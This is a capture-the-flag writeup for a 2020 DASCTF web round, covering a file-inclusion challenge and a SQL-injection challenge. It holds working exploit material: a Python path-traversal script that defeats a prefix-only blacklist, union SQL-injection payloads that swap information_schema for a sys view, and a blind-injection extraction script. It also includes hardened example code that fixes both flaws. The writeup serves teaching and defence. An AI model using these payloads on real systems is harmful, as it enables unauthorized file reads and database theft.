2020-07-25

DASCTF July Round Web Writeup

EzFileInclude

Topics

  • File inclusion

Solution

Working on this one during the contest was... hard to put into words.

Pressing F12 shows that the home page image is loaded from http://183.129.189.60:10009/image.php?t=XXXXXX&f=XXXXXXX

Parameter t is a timestamp, and parameter f is the base64-encoded name of the file to include. Trying to read image.php or index.php directly produced no output at all, so a path is presumably prepended (something like /var/www/html/img/), path-traversal sequences such as ../ are filtered, and wrappers and similar tricks are blocked as well.

I thought about it for a long time and concluded it had to be airtight... only to find out later that if the f parameter starts with a directory and traverses from there, the WAF can be bypassed.

Script:

import requests
import time
import base64

URL = 'http://183.129.189.60:10009/image.php'
# The server rejects timestamps more than 10 seconds off its own clock.
timestamp = int(time.time())
# A leading directory component defeats the prefix-only traversal check.
payload = 'gqy.jpg/../../../../../flag'
params = {'t': timestamp, 'f': base64.b64encode(payload.encode('utf-8')).decode('ascii')}

r = requests.get(url=URL, params=params)
print(r.text)

A look at the source while we're at it:

<?php

// Both parameters are required: t (timestamp) and f (base64-encoded file name).
if(!isset($_GET['t']) || !isset($_GET['f'])){
    echo "you miss some parameters";
    exit();
}

$timestamp = time();

// The client's timestamp must be within 10 seconds of the server's.
if(abs($_GET['t'] - $timestamp) > 10){
    echo "what's your time?";
    exit();
}

$file = base64_decode($_GET['f']);

// Only the *start* of the decoded name is checked for traversal patterns,
// so a name such as "dir/../../flag" passes and is still concatenated below.
if(substr($file, 0, strlen("/../")) === "/../" || substr($file, 0, strlen("../")) === "../" || substr($file, 0, strlen("./")) === "./" || substr($file, 0, strlen("/.")) === "/." || substr($file, 0, strlen("//")) === "//") {
    echo 'You are not allowed to do that.';
}
else{
    echo file_get_contents('/var/www/html/img/'.$file);
}

?>
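The check in image.php looks only at how the decoded name begins, so a traversal that starts with a harmless directory component is never seen. The following Python block is an added example, not code from the challenge or the writeup: it ports the challenge's prefix blacklist one-to-one, puts a containment check beside it that normalizes the concatenated path and requires it to stay below the image directory, and runs both over a legitimate name, a blocked one, and the writeup's bypass. The sample names and the `compare` helper are constructed for illustration.

```python
import posixpath
from typing import Dict, Optional

# Directory the challenge prepends to the requested file (from image.php above).
BASE_DIR = '/var/www/html/img/'

# The prefix blacklist from image.php, ported 1:1 to Python.
BLOCKED_PREFIXES = ('/../', '../', './', '/.', '//')


def prefix_check_allows(file: str) -> bool:
    """The original check: rejects only when the string *starts* like a traversal."""
    return not file.startswith(BLOCKED_PREFIXES)


def resolve_in_base(file: str, base: str = BASE_DIR) -> Optional[str]:
    """Hardened check (added here, not from the page): build the same concatenated
    path the PHP would open, collapse every '..' segment, and accept the result only
    if it is still below base. Returns the normalized path, or None when it escapes."""
    base_norm = posixpath.normpath(base)
    resolved = posixpath.normpath(base + file)   # same concatenation as the PHP
    if posixpath.commonpath([base_norm, resolved]) != base_norm:
        return None
    return resolved


def compare(file: str) -> Dict[str, object]:
    """Side by side: what the prefix check decides vs. where the path really lands."""
    return {'prefix_allows': prefix_check_allows(file),
            'resolved': resolve_in_base(file)}


if __name__ == '__main__':
    # Constructed sample names: a normal image, an obvious traversal, and the bypass.
    for sample in ('gqy.jpg', '../flag', 'gqy.jpg/../../../../../flag'):
        print(f'{sample!r:32} -> {compare(sample)}')
```

`posixpath.normpath` works purely on the string, which is enough to show the logic; on a live filesystem use `os.path.realpath` (PHP: `realpath()` on the joined path, then compare against the base directory) so that a symlink inside the image directory cannot point outside it either.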

SQLi

Topics

  • Bypassing information_schema

Solution

Way out of my depth... I couldn't do the second one.

After the contest I read y1ng's writeup: https://www.gem-love.com/ctf/2514.html

Filtered keywords:

return preg_match("/;|benchmark|\^|if|[\s]|in|case|when|sleep|auto|desc|stat|\||lock|or|and|&|like|-|`/i", $id);

sys.x$schema_flattened_keys is used instead of information_schema, whose name trips the "in" and "or" keywords.

Since the page echoes query results, a direct union injection works:

100%27/**/union/**/SELECT/**/group_concat(table_name),2,3/**/FROM/**//**/sys.x$schema_flattened_keys/**/WHERE/**/table_schema='sqlidb'/**/GROUP/**/BY/**/table_name/**/limit/**/0,1%23

Alternatively, blind injection can be used to extract the table name:

#!/usr/bin/env python3
#-*- coding:utf-8 -*-
#__author__: 颖奇L'Amore www.gem-love.com
import requests as req
import time as t
import string
alpa = string.ascii_letters + string.digits
res = ''
# Database name: sqlidb, obtained via limit injection
# http://183.129.189.60:10004/?id=1%27limit/**/1,1/**/PROCEDURE/**/ANALYSE(1)%23

# Table name: flllaaaggg
payload = '''SELECT group_concat(table_name) FROM sys.x$schema_flattened_keys WHERE table_schema='sqlidb' GROUP BY table_name limit 0,1'''

for i in range(1,100):
    for char in alpa:
        # Spaces are blocked, so they are replaced by empty comments.
        host = '''http://183.129.189.60:10004/?id=1'=(substr(({payload}),{i},1)='{char}')%23'''.format(payload=payload.replace(' ','/**/'), i=i, char=char)

        r = req.get(host)
        # The comparison is true only when the guessed character matches,
        # which makes the normal page content (containing admin666) appear.
        if 'admin666' in r.text:
            res += char
            print("found it: "+res)
            break
        t.sleep(0.2)
    else:
        # No character matched at this position: the name is complete.
        break

Then a union query retrieves the flag:

100'/**/union/**/select/**/*,1/**/from/**/flllaaaggg%23
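The filter above is a keyword blacklist, and the union payloads in this section show why that approach fails: spaces become empty comments, `information_schema` is swapped for a `sys` view whose name contains none of the banned substrings, and the query is still concatenated into SQL. The block below is an added example, not code from the writeup or from y1ng: it ports the challenge's regex to Python, checks which strings it blocks and which it misses, and contrasts a blacklist-guarded concatenated query with an integer allowlist plus a bound parameter. The in-memory SQLite schema, its rows, and the SQLite-compatible union sample (the challenge's `#` comment and `sys` view do not exist in SQLite) are constructed for the demonstration.

```python
import re
import sqlite3
from typing import List, Optional, Tuple

# The keyword blacklist from the writeup (PCRE with the /i flag), ported to Python's re.
BLACKLIST = re.compile(
    r";|benchmark|\^|if|[\s]|in|case|when|sleep|auto|desc|stat|\||lock|or|and|&|like|-|`",
    re.IGNORECASE,
)

# The writeup's union payload with %23 URL-decoded to '#'; used only to test the filter.
WRITEUP_PAYLOAD = ("100'/**/union/**/SELECT/**/group_concat(table_name),2,3/**/FROM/**//**/"
                   "sys.x$schema_flattened_keys/**/WHERE/**/table_schema='sqlidb'/**/GROUP/**/BY/**/"
                   "table_name/**/limit/**/0,1#")

# Constructed SQLite-compatible variant of the same idea (no '#' comment, no sys view).
SQLITE_UNION_SAMPLE = ("1'/**/union/**/select/**/flag,2,3/**/from/**/flllaaaggg"
                       "/**/where/**/'1'='1")


def blacklist_blocks(value: str) -> bool:
    """True when the challenge's regex would reject the id parameter."""
    return BLACKLIST.search(value) is not None


def build_demo_db() -> sqlite3.Connection:
    """Constructed in-memory schema standing in for the challenge's database."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE news(id INTEGER PRIMARY KEY, title TEXT, body TEXT)")
    conn.execute("INSERT INTO news VALUES (1, 'welcome', 'admin666')")
    conn.execute("CREATE TABLE flllaaaggg(flag TEXT)")
    conn.execute("INSERT INTO flllaaaggg VALUES ('flag{constructed_sample}')")
    return conn


def lookup_blacklisted(conn: sqlite3.Connection, raw_id: str) -> Optional[List[Tuple]]:
    """The challenge's pattern: run the blacklist, then concatenate into the query."""
    if blacklist_blocks(raw_id):
        return None
    sql = f"SELECT id, title, body FROM news WHERE id='{raw_id}'"
    return conn.execute(sql).fetchall()


def lookup_hardened(conn: sqlite3.Connection, raw_id: str) -> Optional[List[Tuple]]:
    """Allowlist the type first, then bind the value so the driver never parses it as SQL."""
    try:
        news_id = int(raw_id, 10)
    except ValueError:
        return None
    return conn.execute("SELECT id, title, body FROM news WHERE id=?", (news_id,)).fetchall()


if __name__ == '__main__':
    conn = build_demo_db()
    print("blocks information_schema:", blacklist_blocks("information_schema"))
    print("blocks writeup payload:   ", blacklist_blocks(WRITEUP_PAYLOAD))
    print("blacklist + concat:", lookup_blacklisted(conn, SQLITE_UNION_SAMPLE))
    print("allowlist + bind:  ", lookup_hardened(conn, SQLITE_UNION_SAMPLE))
```

The regex rejects the word `information_schema` outright (it contains both `in` and `or`), which is exactly why the writeup reaches for `sys.x$schema_flattened_keys`; the parameterized version needs no list of bad words because the id is validated as an integer and passed to the driver as data.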

Homebrew Dubbo v2

To be filled in later...

Waiting for next week's livestream walkthrough from the boss.

Copyright © ca01h 2019-2020